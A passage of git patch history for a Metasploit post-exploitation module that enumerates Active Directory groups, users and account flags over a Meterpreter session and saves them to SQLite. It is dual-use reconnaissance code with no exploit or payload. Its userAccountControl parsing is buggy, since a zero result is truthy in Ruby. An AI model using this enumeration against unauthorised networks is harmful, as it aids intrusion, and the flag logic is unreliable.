[#{group_user[3][:value]}][#{user_rid}]" if datastore['SHOW_USERGROUPS'] - - # Add the group to the database - sql_param_user = { rid: user_rid.to_i, - distinguishedName: group_user[0][:value].to_s, - sAMAccountType: group_user[2][:value].to_i, - sAMAccountName: group_user[3][:value].to_s, - displayName: group_user[4][:value].to_s, - description: group_user[5][:value].to_s, - logonCount: group_user[6][:value].to_i, - userAccountControl: group_user[7][:value].to_i, - userPrincipalName: group_user[8][:value].to_s, - whenChanged: group_user[9][:value].to_s, - whenCreated: group_user[10][:value].to_s, - primaryGroupID: group_user[11][:value].to_i, - badPwdCount: group_user[12][:value].to_i, - comments: group_user[13][:value].to_s, - title: group_user[14][:value].to_s, - accountExpires: group_user[15][:value].to_i, - adminCount: group_user[16][:value].to_i - } - run_sqlite_query(db, 'ad_users', sql_param_user) - - # Now associate the user with the group - sql_param_mapping = { user_rid: user_rid.to_i, - group_rid: group_rid.to_i - } - run_sqlite_query(db, 'ad_mapping', sql_param_mapping) - end - - rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e - print_error("Error(Users): #{e.message}") - return + # Perform the ADSI query to retrieve the effective users in each group (recursion) + vprint_status "Retrieving members of #{individual_group[3][:value]}" + users_filter = "(&(objectCategory=person)(objectClass=user)(|(memberof:1.2.840.113556.1.4.1941:=#{individual_group[0][:value]})(primaryGroupID=#{group_rid})))" + users_in_group = query(users_filter, max_search, users_fields) + + # Add the group to the database + sql_param_group = { rid: group_rid.to_i, + distinguishedName: individual_group[0][:value].to_s, + sAMAccountType: individual_group[2][:value].to_i, + sAMAccountName: individual_group[3][:value].to_s, + whenChanged: individual_group[4][:value].to_s, + whenCreated: individual_group[5][:value].to_s, + description: individual_group[6][:value].to_s, + groupType: individual_group[7][:value].to_i, + adminCount: individual_group[8][:value].to_i, + } + run_sqlite_query(db, 'ad_groups', sql_param_group) + + # Go through each group user + next if users_in_group[:results].empty? + users_in_group[:results].each do |group_user| + user_sid, user_rid = sid_hex_to_string(group_user[1][:value]) + print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member [#{group_user[3][:value]}][#{user_rid}]" if datastore['SHOW_USERGROUPS'] + + # Add the group to the database + sql_param_user = { rid: user_rid.to_i, + distinguishedName: group_user[0][:value].to_s, + sAMAccountType: group_user[2][:value].to_i, + sAMAccountName: group_user[3][:value].to_s, + displayName: group_user[4][:value].to_s, + description: group_user[5][:value].to_s, + logonCount: group_user[6][:value].to_i, + userAccountControl: group_user[7][:value].to_i, + userPrincipalName: group_user[8][:value].to_s, + whenChanged: group_user[9][:value].to_s, + whenCreated: group_user[10][:value].to_s, + primaryGroupID: group_user[11][:value].to_i, + badPwdCount: group_user[12][:value].to_i, + comments: group_user[13][:value].to_s, + title: group_user[14][:value].to_s, + accountExpires: group_user[15][:value].to_i, + adminCount: group_user[16][:value].to_i + } + run_sqlite_query(db, 'ad_users', sql_param_user) + + # Now associate the user with the group + sql_param_mapping = { user_rid: user_rid.to_i, + group_rid: group_rid.to_i + } + run_sqlite_query(db, 'ad_mapping', sql_param_mapping) + end + + rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e + print_error("Error(Users): #{e.message}") + next + end + end end + a.map { |x| x.join } end vprint_status "Retrieving computers" From 91c8c2b9dd75afb3345e4f7b6b041d475a612e44 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 12:14:08 +0000 Subject: [PATCH 097/686] Trying to fix threads --- .../post/windows/gather/ad_groupusers_to_sql.rb | 14 +++++++++----- 1 file changed, 9 insertions(+), 5 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index e036af6f33..ab2ee72e3c 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -64,12 +64,16 @@ class Metasploit3 < Msf::Post users_fields = ['distinguishedName', 'objectSid', 'sAMAccountType', 'sAMAccountName', 'displayName', 'description', 'logonCount', 'userAccountControl', 'userPrincipalName', 'whenChanged', 'whenCreated', 'primaryGroupID', 'badPwdCount','comments', 'title', 'accountExpires', 'adminCount'] remaining_groups = groups[:results] - threadcount = datastore['THREADS'] + + # If the number of threads exceeds the number of groups, reduce them down to the correct number + threadcount = remaining_groups.count < datastore['THREADS'] ? remaining_groups.count : datastore['THREADS'] + + # Loop through each of the groups, creating threads where necessary while(not remaining_groups.nil? and not remaining_groups.empty?) print_good "Remaining groups: #{remaining_groups.count}" - a = [] + group_gather = [] 1.upto(threadcount) do - a << framework.threads.spawn("Module(#{self.refname})", false, remaining_groups.shift) do |individual_group| + group_gather << framework.threads.spawn("Module(#{self.refname})", false, remaining_groups.shift) do |individual_group| begin # Get the Group RID @@ -77,7 +81,7 @@ class Metasploit3 < Msf::Post # Perform the ADSI query to retrieve the effective users in each group (recursion) vprint_status "Retrieving members of #{individual_group[3][:value]}" - users_filter = "(&(objectCategory=person)(objectClass=user)(|(memberof:1.2.840.113556.1.4.1941:=#{individual_group[0][:value]})(primaryGroupID=#{group_rid})))" + users_filter = "(&(objectCategory=person)(objectClass=user)(|(memberOf:1.2.840.113556.1.4.1941:=#{individual_group[0][:value]})(primaryGroupID=#{group_rid})))" users_in_group = query(users_filter, max_search, users_fields) # Add the group to the database @@ -133,7 +137,7 @@ class Metasploit3 < Msf::Post end end end - a.map { |x| x.join } + group_gather.map { |each_group| each_group.join } end vprint_status "Retrieving computers" From 0a75fa333c968f0a8c898121432fb8ec5d19f87a Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 12:14:22 +0000 Subject: [PATCH 098/686] msftidy --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index ab2ee72e3c..9dd1fc016c 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Post 1.upto(threadcount) do group_gather << framework.threads.spawn("Module(#{self.refname})", false, remaining_groups.shift) do |individual_group| begin - + # Get the Group RID group_sid, group_rid = sid_hex_to_string(individual_group[1][:value]) From 662010fce719335570b630753a0f15663d363320 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 14:06:50 +0000 Subject: [PATCH 099/686] Added thread capability --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 9dd1fc016c..54a1b19d07 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -70,12 +70,13 @@ class Metasploit3 < Msf::Post # Loop through each of the groups, creating threads where necessary while(not remaining_groups.nil? and not remaining_groups.empty?) - print_good "Remaining groups: #{remaining_groups.count}" group_gather = [] 1.upto(threadcount) do group_gather << framework.threads.spawn("Module(#{self.refname})", false, remaining_groups.shift) do |individual_group| begin + next if !individual_group || individual_group.empty? || individual_group.nil? + # Get the Group RID group_sid, group_rid = sid_hex_to_string(individual_group[1][:value]) @@ -193,7 +194,8 @@ class Metasploit3 < Msf::Post # Creat the SQLite Database def create_sqlite_db begin - filename = "#{::Dir::Tmpname.tmpdir}/#{::Dir::Tmpname.make_tmpname('ad', 5)}.db" + obj_temp = ::Dir::Tmpname + filename = "#{obj_temp.tmpdir}/#{obj_temp.make_tmpname('ad_', 2)}.db" db = SQLite3::Database.new(filename) # Create the table for the AD Computers From 5b07a35cef5f34d8e5934e570a52d8f11f848680 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 14:10:00 +0000 Subject: [PATCH 100/686] Added LDAP filter to identify groups of interest --- modules/post/windows/gather/ad_groupusers_to_sql.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 54a1b19d07..2c385f72a6 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -29,6 +29,7 @@ class Metasploit3 < Msf::Post )) register_options([ + OptString.new('GROUP_FILTER', [true, 'Filter to identify groups', '(objectClass=group)']), OptBool.new('SHOW_USERGROUPS', [true, 'Show the user/group membership in a greppable form.', false]), OptBool.new('SHOW_COMPUTERS', [true, 'Show basic computer information in a greppable form.', false]), OptInt.new('THREADS', [true, 'Number of threads to spawn to gather membership of each group.', 20]) @@ -45,9 +46,8 @@ class Metasploit3 < Msf::Post # Download the list of groups from Active Directory vprint_status "Retrieving AD Groups" begin - group_filter = '(objectClass=group)' group_fields = ['distinguishedName', 'objectSid', 'samAccountType', 'sAMAccountName', 'whenChanged', 'whenCreated', 'description', 'groupType', 'adminCount'] - groups = query(group_filter, max_search, group_fields) + groups = query(datastore['GROUP_FILTER'], max_search, group_fields) rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e print_error("Error(Group): #{e.message}") return From 6d6306f6e70cef7e8c0ad2969cbfd06f791e6ef8 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 21:14:39 +0000 Subject: [PATCH 101/686] Added sAMAccountType constants from MSDN --- .../windows/gather/ad_groupusers_to_sql.rb | 21 +++++++++++++++++++ 1 file changed, 21 insertions(+) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 2c385f72a6..90de671b7c 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -265,6 +265,27 @@ class Metasploit3 < Msf::Post 'FOREIGN KEY(group_rid) REFERENCES ad_groups(rid))' db.execute(sql_table_mapping) + # Create the reference table for sAMAccountType + # https://msdn.microsoft.com/en-us/library/windows/desktop/ms679637(v=vs.85).aspx + db.execute('DROP TABLE IF EXISTS ref_sAMAccountType') + sql_table_ref_sac = 'CREATE TABLE ref_sAMAccountType ('\ + 'id INTEGER PRIMARY KEY NOT NULL,'\ + 'name TEXT UNIQUE NOT NULL)' + db.execute(sql_table_ref_sac) + + # Now insert the data into the sAMAccoutType reference table + db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_DOMAIN_OBJECT',0)") + db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_GROUP_OBJECT',0x10000000)") + db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_NON_SECURITY_GROUP_OBJECT',0x10000001)") + db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_ALIAS_OBJECT',0x20000000)") + db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_NON_SECURITY_ALIAS_OBJECT',0x20000001)") + db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_NORMAL_USER_ACCOUNT',0x30000000)") + db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_MACHINE_ACCOUNT',0x30000001)") + db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_TRUST_ACCOUNT',0x30000002)") + db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_APP_BASIC_GROUP',0x40000000)") + db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_APP_QUERY_GROUP',0x40000001)") + db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_ACCOUNT_TYPE_MAX',0x7fffffff)") + return db, filename rescue SQLite3::Exception => e print_error("Error(Database): #{e.message}") From 8821caa199ef0c657f86ead63f7c1e39d599e36f Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 21:37:31 +0000 Subject: [PATCH 102/686] Added UserAccountControl constants --- .../windows/gather/ad_groupusers_to_sql.rb | 55 ++++++++++++++++++- 1 file changed, 54 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 90de671b7c..89497f45b7 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -105,6 +105,7 @@ class Metasploit3 < Msf::Post print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member [#{group_user[3][:value]}][#{user_rid}]" if datastore['SHOW_USERGROUPS'] # Add the group to the database + # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx sql_param_user = { rid: user_rid.to_i, distinguishedName: group_user[0][:value].to_s, sAMAccountType: group_user[2][:value].to_i, @@ -121,7 +122,56 @@ class Metasploit3 < Msf::Post comments: group_user[13][:value].to_s, title: group_user[14][:value].to_s, accountExpires: group_user[15][:value].to_i, - adminCount: group_user[16][:value].to_i + adminCount: group_user[16][:value].to_i, + # The login script is executed + ADS_UF_SCRIPT: (group_user[7][:value].to_i & 0x00000001) ? 1 : 0, + #The user account is disabled. + ADS_UF_ACCOUNTDISABLE: (group_user[7][:value].to_i & 0x00000002) ? 1 : 0, + #The home directory is required. + ADS_UF_HOMEDIR_REQUIRED: (group_user[7][:value].to_i & 0x00000008) ? 1 : 0, + #The account is currently locked out. + ADS_UF_LOCKOUT: (group_user[7][:value].to_i & 0x00000010) ? 1 : 0, + #No password is required. + ADS_UF_PASSWD_NOTREQD: (group_user[7][:value].to_i & 0x00000020) ? 1 : 0, + #The user cannot change the password. + ADS_UF_PASSWD_CANT_CHANGE: (group_user[7][:value].to_i & 0x00000040) ? 1 : 0, + #The user can send an encrypted password. + ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (group_user[7][:value].to_i & 0x00000080) ? 1 : 0, + #This is an account for users whose primary account is in another domain. This account + #provides user access to this domain, but not to any domain that trusts this domain. + #Also known as a local user account. + ADS_UF_TEMP_DUPLICATE_ACCOUNT: (group_user[7][:value].to_i & 0x00000100) ? 1 : 0, + #This is a default account type that represents a typical user. + ADS_UF_NORMAL_ACCOUNT: (group_user[7][:value].to_i & 0x00000200) ? 1 : 0, + #This is a permit to trust account for a system domain that trusts other domains. + ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (group_user[7][:value].to_i & 0x00000800) ? 1 : 0, + #This is a computer account for a computer that is a member of this domain. + ADS_UF_WORKSTATION_TRUST_ACCOUNT: (group_user[7][:value].to_i & 0x00001000) ? 1 : 0, + #This is a computer account for a system backup domain controller that is a member of this domain. + ADS_UF_SERVER_TRUST_ACCOUNT: (group_user[7][:value].to_i & 0x00002000) ? 1 : 0, + #The password for this account will never expire. + ADS_UF_DONT_EXPIRE_PASSWD: (group_user[7][:value].to_i & 0x00010000) ? 1 : 0, + #This is an MNS logon account. + ADS_UF_MNS_LOGON_ACCOUNT: (group_user[7][:value].to_i & 0x00020000) ? 1 : 0, + #The user must log on using a smart card. + ADS_UF_SMARTCARD_REQUIRED: (group_user[7][:value].to_i & 0x00040000) ? 1 : 0, + #The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. + #Any such service can impersonate a client requesting the service. + ADS_UF_TRUSTED_FOR_DELEGATION: (group_user[7][:value].to_i & 0x00080000) ? 1 : 0, + #The security context of the user will not be delegated to a service even if the service + #account is set as trusted for Kerberos delegation. + ADS_UF_NOT_DELEGATED: (group_user[7][:value].to_i & 0x00100000) ? 1 : 0, + #Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. + ADS_UF_USE_DES_KEY_ONLY: (group_user[7][:value].to_i & 0x00200000) ? 1 : 0, + #This account does not require Kerberos pre-authentication for logon. + ADS_UF_DONT_REQUIRE_PREAUTH: (group_user[7][:value].to_i & 0x00400000) ? 1 : 0, + #The password has expired + ADS_UF_PASSWORD_EXPIRED: (group_user[7][:value].to_i & 0x00800000) ? 1 : 0, + #The account is enabled for delegation. This is a security-sensitive setting; accounts with + #this option enabled should be strictly controlled. This setting enables a service running + #under the account to assume a client identity and authenticate as that user to other remote + #servers on the network. + ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (group_user[7][:value].to_i & 0x01000000) ? 1 : 0 } run_sqlite_query(db, 'ad_users', sql_param_user) @@ -274,6 +324,9 @@ class Metasploit3 < Msf::Post db.execute(sql_table_ref_sac) # Now insert the data into the sAMAccoutType reference table + # SQLite v3.7+ supports a rather convoluted UNION SELECT way of adding multiple rows + # in one query but for the sake of simplicity and readability, I have just left these as + # separate insert statements. Its hardly an efficiency problem given the rest of the module! db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_DOMAIN_OBJECT',0)") db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_GROUP_OBJECT',0x10000000)") db.execute("insert into ref_sAMAccountType (name,id) VALUES ('SAM_NON_SECURITY_GROUP_OBJECT',0x10000001)") From a065fc803cae88f432e75c0ccaff0338eb4d2bc5 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 21:38:54 +0000 Subject: [PATCH 103/686] fixed spacing --- .../windows/gather/ad_groupusers_to_sql.rb | 100 +++++++++--------- 1 file changed, 51 insertions(+), 49 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 89497f45b7..1c1fb2b6e3 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -122,56 +122,58 @@ class Metasploit3 < Msf::Post comments: group_user[13][:value].to_s, title: group_user[14][:value].to_s, accountExpires: group_user[15][:value].to_i, + #Indicates that a given object has had its ACLs changed to a more secure value by the + #system because it was a member of one of the administrative groups (directly or transitively). adminCount: group_user[16][:value].to_i, - # The login script is executed - ADS_UF_SCRIPT: (group_user[7][:value].to_i & 0x00000001) ? 1 : 0, - #The user account is disabled. - ADS_UF_ACCOUNTDISABLE: (group_user[7][:value].to_i & 0x00000002) ? 1 : 0, - #The home directory is required. - ADS_UF_HOMEDIR_REQUIRED: (group_user[7][:value].to_i & 0x00000008) ? 1 : 0, - #The account is currently locked out. - ADS_UF_LOCKOUT: (group_user[7][:value].to_i & 0x00000010) ? 1 : 0, - #No password is required. - ADS_UF_PASSWD_NOTREQD: (group_user[7][:value].to_i & 0x00000020) ? 1 : 0, - #The user cannot change the password. - ADS_UF_PASSWD_CANT_CHANGE: (group_user[7][:value].to_i & 0x00000040) ? 1 : 0, - #The user can send an encrypted password. - ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (group_user[7][:value].to_i & 0x00000080) ? 1 : 0, - #This is an account for users whose primary account is in another domain. This account - #provides user access to this domain, but not to any domain that trusts this domain. - #Also known as a local user account. - ADS_UF_TEMP_DUPLICATE_ACCOUNT: (group_user[7][:value].to_i & 0x00000100) ? 1 : 0, - #This is a default account type that represents a typical user. - ADS_UF_NORMAL_ACCOUNT: (group_user[7][:value].to_i & 0x00000200) ? 1 : 0, - #This is a permit to trust account for a system domain that trusts other domains. - ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (group_user[7][:value].to_i & 0x00000800) ? 1 : 0, - #This is a computer account for a computer that is a member of this domain. - ADS_UF_WORKSTATION_TRUST_ACCOUNT: (group_user[7][:value].to_i & 0x00001000) ? 1 : 0, - #This is a computer account for a system backup domain controller that is a member of this domain. - ADS_UF_SERVER_TRUST_ACCOUNT: (group_user[7][:value].to_i & 0x00002000) ? 1 : 0, - #The password for this account will never expire. - ADS_UF_DONT_EXPIRE_PASSWD: (group_user[7][:value].to_i & 0x00010000) ? 1 : 0, - #This is an MNS logon account. - ADS_UF_MNS_LOGON_ACCOUNT: (group_user[7][:value].to_i & 0x00020000) ? 1 : 0, - #The user must log on using a smart card. - ADS_UF_SMARTCARD_REQUIRED: (group_user[7][:value].to_i & 0x00040000) ? 1 : 0, - #The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. - #Any such service can impersonate a client requesting the service. - ADS_UF_TRUSTED_FOR_DELEGATION: (group_user[7][:value].to_i & 0x00080000) ? 1 : 0, - #The security context of the user will not be delegated to a service even if the service - #account is set as trusted for Kerberos delegation. - ADS_UF_NOT_DELEGATED: (group_user[7][:value].to_i & 0x00100000) ? 1 : 0, - #Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. - ADS_UF_USE_DES_KEY_ONLY: (group_user[7][:value].to_i & 0x00200000) ? 1 : 0, - #This account does not require Kerberos pre-authentication for logon. - ADS_UF_DONT_REQUIRE_PREAUTH: (group_user[7][:value].to_i & 0x00400000) ? 1 : 0, - #The password has expired - ADS_UF_PASSWORD_EXPIRED: (group_user[7][:value].to_i & 0x00800000) ? 1 : 0, - #The account is enabled for delegation. This is a security-sensitive setting; accounts with - #this option enabled should be strictly controlled. This setting enables a service running - #under the account to assume a client identity and authenticate as that user to other remote - #servers on the network. - ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (group_user[7][:value].to_i & 0x01000000) ? 1 : 0 + #The login script is executed + ADS_UF_SCRIPT: (group_user[7][:value].to_i & 0x00000001) ? 1 : 0, + #The user account is disabled. + ADS_UF_ACCOUNTDISABLE: (group_user[7][:value].to_i & 0x00000002) ? 1 : 0, + #The home directory is required. + ADS_UF_HOMEDIR_REQUIRED: (group_user[7][:value].to_i & 0x00000008) ? 1 : 0, + #The account is currently locked out. + ADS_UF_LOCKOUT: (group_user[7][:value].to_i & 0x00000010) ? 1 : 0, + #No password is required. + ADS_UF_PASSWD_NOTREQD: (group_user[7][:value].to_i & 0x00000020) ? 1 : 0, + #The user cannot change the password. + ADS_UF_PASSWD_CANT_CHANGE: (group_user[7][:value].to_i & 0x00000040) ? 1 : 0, + #The user can send an encrypted password. + ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (group_user[7][:value].to_i & 0x00000080) ? 1 : 0, + #This is an account for users whose primary account is in another domain. This account + #provides user access to this domain, but not to any domain that trusts this domain. + #Also known as a local user account. + ADS_UF_TEMP_DUPLICATE_ACCOUNT: (group_user[7][:value].to_i & 0x00000100) ? 1 : 0, + #This is a default account type that represents a typical user. + ADS_UF_NORMAL_ACCOUNT: (group_user[7][:value].to_i & 0x00000200) ? 1 : 0, + #This is a permit to trust account for a system domain that trusts other domains. + ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (group_user[7][:value].to_i & 0x00000800) ? 1 : 0, + #This is a computer account for a computer that is a member of this domain. + ADS_UF_WORKSTATION_TRUST_ACCOUNT: (group_user[7][:value].to_i & 0x00001000) ? 1 : 0, + #This is a computer account for a system backup domain controller that is a member of this domain. + ADS_UF_SERVER_TRUST_ACCOUNT: (group_user[7][:value].to_i & 0x00002000) ? 1 : 0, + #The password for this account will never expire. + ADS_UF_DONT_EXPIRE_PASSWD: (group_user[7][:value].to_i & 0x00010000) ? 1 : 0, + #This is an MNS logon account. + ADS_UF_MNS_LOGON_ACCOUNT: (group_user[7][:value].to_i & 0x00020000) ? 1 : 0, + #The user must log on using a smart card. + ADS_UF_SMARTCARD_REQUIRED: (group_user[7][:value].to_i & 0x00040000) ? 1 : 0, + #The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. + #Any such service can impersonate a client requesting the service. + ADS_UF_TRUSTED_FOR_DELEGATION: (group_user[7][:value].to_i & 0x00080000) ? 1 : 0, + #The security context of the user will not be delegated to a service even if the service + #account is set as trusted for Kerberos delegation. + ADS_UF_NOT_DELEGATED: (group_user[7][:value].to_i & 0x00100000) ? 1 : 0, + #Restrict this principal to use only Data #Encryption Standard (DES) encryption types for keys. + ADS_UF_USE_DES_KEY_ONLY: (group_user[7][:value].to_i & 0x00200000) ? 1 : 0, + #This account does not require Kerberos pre-authentication for logon. + ADS_UF_DONT_REQUIRE_PREAUTH: (group_user[7][:value].to_i & 0x00400000) ? 1 : 0, + #The password has expired + ADS_UF_PASSWORD_EXPIRED: (group_user[7][:value].to_i & 0x00800000) ? 1 : 0, + #The account is enabled for delegation. This is a security-sensitive setting; accounts with + #this option enabled should be strictly controlled. This setting enables a service running + #under the account to assume a client identity and authenticate as that user to other remote + #servers on the network. + ADS_UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION: (group_user[7][:value].to_i & 0x01000000) ? 1 : 0 } run_sqlite_query(db, 'ad_users', sql_param_user) From 838f74ff74f8f803e31db74fb02a375aa31feeb9 Mon Sep 17 00:00:00 2001 From: Stuart Morgan Date: Fri, 18 Dec 2015 21:45:07 +0000 Subject: [PATCH 104/686] Added table creation for userAccoutControl --- .../windows/gather/ad_groupusers_to_sql.rb | 69 ++++++++++++------- 1 file changed, 46 insertions(+), 23 deletions(-) diff --git a/modules/post/windows/gather/ad_groupusers_to_sql.rb b/modules/post/windows/gather/ad_groupusers_to_sql.rb index 1c1fb2b6e3..d124892eef 100644 --- a/modules/post/windows/gather/ad_groupusers_to_sql.rb +++ b/modules/post/windows/gather/ad_groupusers_to_sql.rb @@ -104,6 +104,8 @@ class Metasploit3 < Msf::Post user_sid, user_rid = sid_hex_to_string(group_user[1][:value]) print_line "Group [#{individual_group[3][:value]}][#{group_rid}] has member [#{group_user[3][:value]}][#{user_rid}]" if datastore['SHOW_USERGROUPS'] + uac_int = group_user[7][:value].to_i #Set this because it is used so frequently below + # Add the group to the database # Also parse the ADF_ flags from userAccountControl: https://msdn.microsoft.com/en-us/library/windows/desktop/ms680832(v=vs.85).aspx sql_param_user = { rid: user_rid.to_i, @@ -113,7 +115,7 @@ class Metasploit3 < Msf::Post displayName: group_user[4][:value].to_s, description: group_user[5][:value].to_s, logonCount: group_user[6][:value].to_i, - userAccountControl: group_user[7][:value].to_i, + userAccountControl: uac_int, userPrincipalName: group_user[8][:value].to_s, whenChanged: group_user[9][:value].to_s, whenCreated: group_user[10][:value].to_s, @@ -126,54 +128,54 @@ class Metasploit3 < Msf::Post #system because it was a member of one of the administrative groups (directly or transitively). adminCount: group_user[16][:value].to_i, #The login script is executed - ADS_UF_SCRIPT: (group_user[7][:value].to_i & 0x00000001) ? 1 : 0, + ADS_UF_SCRIPT: (uac_int & 0x00000001) ? 1 : 0, #The user account is disabled. - ADS_UF_ACCOUNTDISABLE: (group_user[7][:value].to_i & 0x00000002) ? 1 : 0, + ADS_UF_ACCOUNTDISABLE: (uac_int & 0x00000002) ? 1 : 0, #The home directory is required. - ADS_UF_HOMEDIR_REQUIRED: (group_user[7][:value].to_i & 0x00000008) ? 1 : 0, + ADS_UF_HOMEDIR_REQUIRED: (uac_int & 0x00000008) ? 1 : 0, #The account is currently locked out. - ADS_UF_LOCKOUT: (group_user[7][:value].to_i & 0x00000010) ? 1 : 0, + ADS_UF_LOCKOUT: (uac_int & 0x00000010) ? 1 : 0, #No password is required. - ADS_UF_PASSWD_NOTREQD: (group_user[7][:value].to_i & 0x00000020) ? 1 : 0, + ADS_UF_PASSWD_NOTREQD: (uac_int & 0x00000020) ? 1 : 0, #The user cannot change the password. - ADS_UF_PASSWD_CANT_CHANGE: (group_user[7][:value].to_i & 0x00000040) ? 1 : 0, + ADS_UF_PASSWD_CANT_CHANGE: (uac_int & 0x00000040) ? 1 : 0, #The user can send an encrypted password. - ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (group_user[7][:value].to_i & 0x00000080) ? 1 : 0, + ADS_UF_ENCRYPTED_TEXT_PASSWORD_ALLOWED: (uac_int & 0x00000080) ? 1 : 0, #This is an account for users whose primary account is in another domain. This account #provides user access to this domain, but not to any domain that trusts this domain. #Also known as a local user account. - ADS_UF_TEMP_DUPLICATE_ACCOUNT: (group_user[7][:value].to_i & 0x00000100) ? 1 : 0, + ADS_UF_TEMP_DUPLICATE_ACCOUNT: (uac_int & 0x00000100) ? 1 : 0, #This is a default account type that represents a typical user. - ADS_UF_NORMAL_ACCOUNT: (group_user[7][:value].to_i & 0x00000200) ? 1 : 0, + ADS_UF_NORMAL_ACCOUNT: (uac_int & 0x00000200) ? 1 : 0, #This is a permit to trust account for a system domain that trusts other domains. - ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (group_user[7][:value].to_i & 0x00000800) ? 1 : 0, + ADS_UF_INTERDOMAIN_TRUST_ACCOUNT: (uac_int & 0x00000800) ? 1 : 0, #This is a computer account for a computer that is a member of this domain. - ADS_UF_WORKSTATION_TRUST_ACCOUNT: (group_user[7][:value].to_i & 0x00001000) ? 1 : 0, + ADS_UF_WORKSTATION_TRUST_ACCOUNT: (uac_int & 0x00001000) ? 1 : 0, #This is a computer account for a system backup domain controller that is a member of this domain. - ADS_UF_SERVER_TRUST_ACCOUNT: (group_user[7][:value].to_i & 0x00002000) ? 1 : 0, + ADS_UF_SERVER_TRUST_ACCOUNT: (uac_int & 0x00002000) ? 1 : 0, #The password for this account will never expire. - ADS_UF_DONT_EXPIRE_PASSWD: (group_user[7][:value].to_i & 0x00010000) ? 1 : 0, + ADS_UF_DONT_EXPIRE_PASSWD: (uac_int & 0x00010000) ? 1 : 0, #This is an MNS logon account. - ADS_UF_MNS_LOGON_ACCOUNT: (group_user[7][:value].to_i & 0x00020000) ? 1 : 0, + ADS_UF_MNS_LOGON_ACCOUNT: (uac_int & 0x00020000) ? 1 : 0, #The user must log on using a smart card. - ADS_UF_SMARTCARD_REQUIRED: (group_user[7][:value].to_i & 0x00040000) ? 1 : 0, + ADS_UF_SMARTCARD_REQUIRED: (uac_int & 0x00040000) ? 1 : 0, #The service account (user or computer account), under which a service runs, is trusted for Kerberos delegation. 